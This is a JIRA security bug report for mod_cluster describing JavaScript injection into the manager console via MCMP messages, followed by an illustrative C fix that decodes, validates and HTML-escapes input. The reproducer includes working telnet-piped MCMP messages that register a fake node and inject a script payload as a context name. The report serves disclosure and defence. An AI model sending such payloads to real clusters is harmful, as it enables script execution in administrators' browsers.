Michal Babacek updated MODCLUSTER-453:
--------------------------------------
Security: (was: Security Issue)
It is possible to inject JavaScript into mod_cluster manager console
via MCMP messages
--------------------------------------------------------------------------------------
Key: MODCLUSTER-453
URL: https://issues.jboss.org/browse/MODCLUSTER-453
Project: mod_cluster
Issue Type: Bug
Components: Native (httpd modules)
Affects Versions: 1.2.6.Final, 1.2.9.Final, 1.2.11.Final, 1.3.1.Beta2
Reporter: Michal Babacek
Assignee: Jean-Frederic Clere
Priority: Critical
Fix For: 1.3.2.Alpha1
Attachments: MODCLUSTER-453_master-better_one.patch,
MODCLUSTER-453_master-mbabacek.patch, MODCLUSTER-453_master-offensive_approach.patch,
patch.new.best.patch, patch.new.txt, patch.txt
This is a nasty one indeed :-)
h3. Steps to reproduce
* start Apache HTTP Server with mod_cluster
* send these messages (provided your test instance listens on 127.0.0.1:6666)
{code}
# 1. register a fake worker node
{
  echo "CONFIG / HTTP/1.1"
  echo "Host: localhost.localdomain:6666"
  echo "Content-Length: 95"
  echo "User-Agent: Prdel"
  echo ""
  echo "JVMRoute=fake-1&Host=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"
  sleep 1
} | telnet 127.0.0.1 6666

# 2. enable a context whose (URL-encoded) name is /X<script>alert('X');</script>
{
  echo "ENABLE-APP / HTTP/1.1"
  echo "Host: localhost.localdomain:6666"
  echo "Content-Length: 102"
  echo "User-Agent: ClusterListener%2F1.0"
  echo ""
  echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'
  sleep 1
} | telnet 127.0.0.1 6666
{code}
* Open http://localhost:6666/mod_cluster_manager and enjoy the JavaScript pop-up alert being executed.
h3. Impact
* Anyone with access to the (hopefully only internal) network from which MCMP messages are allowed to come could send these messages and execute arbitrary JavaScript code in the browser of whoever opens the manager console.
h3. Suggestion
* Leverage {{apr_escape*}} to sanitize MCMP messages.
h3. Proposed patch
* [^patch.new.best.patch]: MCMP messages containing suspicious characters are discarded.
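The following is an added illustration of the two defences discussed above (reject MCMP values with characters they should never carry, as the proposed patch does, and HTML-escape whatever is echoed into the manager page, as the {{apr_escape*}} suggestion does). It is not mod_cluster code and not one of the attached patches; the allow-list, the percent decoder and the escaper are this example's own (the escaper stands in for APR's {{apr_pescape_entity()}} so the file compiles without APR). It runs the exact Context value from the reproducer through decode, validate and escape.

```c
/* Added example, not mod_cluster's code. Demonstrates how a value taken
 * from an MCMP message (Context, Alias, JVMRoute) can be handled before it
 * is stored and later rendered into /mod_cluster_manager. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* In-place %XX decoding, as the MCMP parameters in the reproducer are sent
 * percent-encoded. Only %XX is handled (assumption for this example).
 * Returns 0 on a malformed escape, 1 otherwise. */
int percent_decode(char *s)
{
    char *r = s, *w = s;
    while (*r) {
        if (*r == '%') {
            if (!isxdigit((unsigned char)r[1]) || !isxdigit((unsigned char)r[2]))
                return 0;
            char hex[3] = { r[1], r[2], '\0' };
            *w++ = (char)strtol(hex, NULL, 16);
            r += 3;
        } else {
            *w++ = *r++;
        }
    }
    *w = '\0';
    return 1;
}

/* Allow-list for an MCMP value: alphanumerics plus the separators that
 * legitimate contexts, aliases and routes use. The exact set is an
 * assumption of this example, not mod_cluster's rule. */
static int mcmp_char_ok(unsigned char c)
{
    if (isalnum(c))
        return 1;
    return c != '\0' && strchr("-._~/:", c) != NULL;
}

/* Validate the DECODED value: checking the raw "%3C..." form would let the
 * payload through, since it only contains allowed characters. Returns 1 if
 * the value may be stored, 0 if the message must be discarded. */
int mcmp_value_valid(const char *value)
{
    for (const unsigned char *p = (const unsigned char *)value; *p; p++)
        if (!mcmp_char_ok(*p))
            return 0;
    return 1;
}

/* HTML-entity escape for anything written into the manager page, the same
 * transformation apr_pescape_entity() performs. Caller frees the result. */
char *html_escape(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p; p++) {
        switch (*p) {
        case '<': case '>': n += 4; break;   /* &lt; &gt;  */
        case '&': case '\'': n += 5; break;  /* &amp; &#39; */
        case '"': n += 6; break;             /* &quot;     */
        default: n += 1;
        }
    }
    char *out = malloc(n + 1);
    if (!out)
        return NULL;
    char *q = out;
    for (const char *p = s; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '<': rep = "&lt;"; break;
        case '>': rep = "&gt;"; break;
        case '&': rep = "&amp;"; break;
        case '"': rep = "&quot;"; break;
        case '\'': rep = "&#39;"; break;
        }
        if (rep) {
            size_t l = strlen(rep);
            memcpy(q, rep, l);
            q += l;
        } else {
            *q++ = *p;
        }
    }
    *q = '\0';
    return out;
}

int main(void)
{
    /* The Context value from the ENABLE-APP message in the reproducer. */
    char context[] = "%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E";
    if (!percent_decode(context))
        return 1;
    printf("decoded : %s\n", context);
    printf("accepted: %s\n", mcmp_value_valid(context) ? "yes" : "no (discard message)");
    char *safe = html_escape(context);
    printf("rendered: %s\n", safe);   /* what the page should emit if it were stored anyway */
    free(safe);
    return 0;
}
```

Rejecting at the MCMP layer and escaping at the HTML layer are not alternatives: the first keeps garbage out of shared memory and the second protects the page even when a value arrives through a path the validator did not cover.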